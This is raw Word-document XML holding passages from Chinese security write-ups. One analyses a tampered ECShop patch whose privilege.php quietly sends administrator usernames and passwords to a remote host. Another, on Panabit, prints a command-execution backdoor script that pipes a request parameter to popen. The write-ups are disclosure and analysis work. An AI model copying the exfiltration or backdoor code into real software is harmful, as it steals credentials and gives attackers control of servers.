      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95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宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>妈</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>呀！</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Ecshop </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>你叫我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小</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>长肿</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>办</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>！！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="13"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="23"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="283" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="415"/>
        <w:jc w:val="both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lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>补丁是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273utf8_patch006 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，包我幸运的保留下来了，提供</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>给乌</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>云管理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-3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放到网</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>盘给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>厂商和安全研究人</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>员</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>分析。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="28" w:line="283" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="470"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s9159" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:50.35pt;width:337.9pt;height:213.85pt;z-index:505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/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>stat</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> privilege.php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</w:rPr>
                    <w:t>16777218 43425476 -rw-r--r-- 1 root root 0 25952 "Jun</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="2789"/>
                      <w:tab w:val="left" w:pos="5400"/>
                    </w:tabs>
                    <w:spacing w:before="124"/>
                    <w:ind w:left="180"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>4 19:16:09</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-86"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>2013"</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-40"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"May</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>6 14:18:36</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-84"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>2013"</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-40"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"Jun</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>4</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-47"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>18:59:14</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="1584"/>
                    </w:tabs>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="180"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>2013"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"May</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>6 14:18:36 2013" 4096 56 0</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-11"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>privilege.php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 w:line="391" w:lineRule="auto"/>
                    <w:ind w:left="180"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>@file_get_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>contents(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>'http://**.**.**.**/api/manyou/ec shop/w2.php?username=</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>'.$_POST['username'].'&amp;password</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="180"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>='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_POST['password'].'---'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_SERVER['REMOTE_ADDR'].</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124"/>
                    <w:ind w:left="180"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'---'.</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>date(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'Y-m-d|H:i:s').'---'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_SERVER['HTTP_HOST']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_SERVER['PHP_SELF']);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="11"/>
                    <w:rPr>
                      <w:rFonts w:ascii="MS Mincho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953" w:right="4603"/>
                    <w:jc w:val="center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登录成功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</w:rPr>
        <w:t>问题出在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">/admin/privilege.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中（管理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>员</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>身份</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件），登</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成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功</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>置身份</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息前，一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-58"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>file_get_content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:spacing w:val="-30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，怪不得会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之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前一些大牛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的分析。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="283" w:lineRule="auto"/>
        <w:jc w:val="both"/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9158" type="#_x0000_t202" style="width:337.5pt;height:67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980" w:right="50"/>
                  </w:pPr>
                  <w:bookmarkStart w:id="59" w:name="panabit高危漏洞合集"/>
                  <w:bookmarkStart w:id="60" w:name="_bookmark28"/>
                  <w:bookmarkEnd w:id="59"/>
                  <w:bookmarkEnd w:id="60"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>set_admin_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>session(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$row['user_id'],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row[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'user_name'], $row['action_list'],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row[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'last_login']);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2"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="38" w:line="326" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="317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w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这个代码将管理员用户名、密码、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、时间和后台地址等信息通通的发到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95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远程接口上，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">http://**.**.**.**/api/manyou/ecshop/w2.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这个地址直接访问没什么，当我访问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ecshop </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这个目录的时候发现居然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可以目录遍历，还有一个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ok.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w: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292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>panabit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>高危漏洞合集</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:b/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>作者：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>f4ckbaidu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">0x03 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>门</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9157" type="#_x0000_t202" style="position:absolute;margin-left:80.7pt;margin-top:18.85pt;width:337.5pt;height:246.45pt;z-index:510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宋体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panaos#</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>cat /usr/ramdisk/www/sys/cmdhandle.php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$doc = $_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>SERVER[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'DOCUMENT_ROOT'];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$cmd = $_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"cmd"];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3778"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$type = $_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'type']; if ($type == "get"){</w:t>
                  </w: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 xml:space="preserve">$ds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 ', $cmd);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体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宋体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095" w:right="2863"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$fp = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>popen(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$cmd, "r"); if (!$fp){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="215" w:lineRule="exact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</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>命令执行失败</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112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exit(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>0);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(is_file($ds[1]) &amp;&amp; !file_exists($ds[1])){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宋体"/>
          <w:sz w:val="25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pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict>
          <v:group id="_x0000_s8885" style="position:absolute;margin-left:80.85pt;margin-top:72.25pt;width:337.25pt;height:572.2pt;z-index:-365824;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordorigin="1617,1445" coordsize="6745,11444">
            <v:rect id="_x0000_s9156" style="position:absolute;left:1617;top:1445;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9155" style="position:absolute;left:1797;top:1688;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9154" style="position:absolute;left:2713;top:1688;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9153" style="position:absolute;left:3629;top:1688;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9152" style="position:absolute;left:4111;top:1688;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9151" style="position:absolute;left:4231;top:1688;width:603;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9150" style="position:absolute;left:4834;top:1688;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9149" style="position:absolute;left:4954;top:1688;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9148" style="position:absolute;left:5195;top:1688;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9147" style="position:absolute;left:5316;top:1688;width:1084;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9146" style="position:absolute;left:1617;top:1951;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9145" style="position:absolute;left:1797;top:2014;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9144" style="position:absolute;left:2713;top:2014;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9143" style="position:absolute;left:3629;top:2014;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9142" style="position:absolute;left:1617;top:2277;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9141" style="position:absolute;left:1797;top:2340;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9140" style="position:absolute;left:2713;top:2340;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9139" style="position:absolute;left:1617;top:2603;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9138" style="position:absolute;left:1797;top:2666;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9137" style="position:absolute;left:2713;top:2666;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9136" style="position:absolute;left:3195;top:2666;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9135" style="position:absolute;left:3315;top:2666;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9134" style="position:absolute;left:3436;top:2666;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9133" style="position:absolute;left:3556;top:2666;width:362;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9132" style="position:absolute;left:1617;top:2929;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9131" style="position:absolute;left:1797;top:2992;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9130" style="position:absolute;left:2713;top:2992;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9129" style="position:absolute;left:3556;top:2992;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9128" style="position:absolute;left:3677;top:2992;width:1325;height:200" fillcolor="#f8f8f8" stroked="f"/>
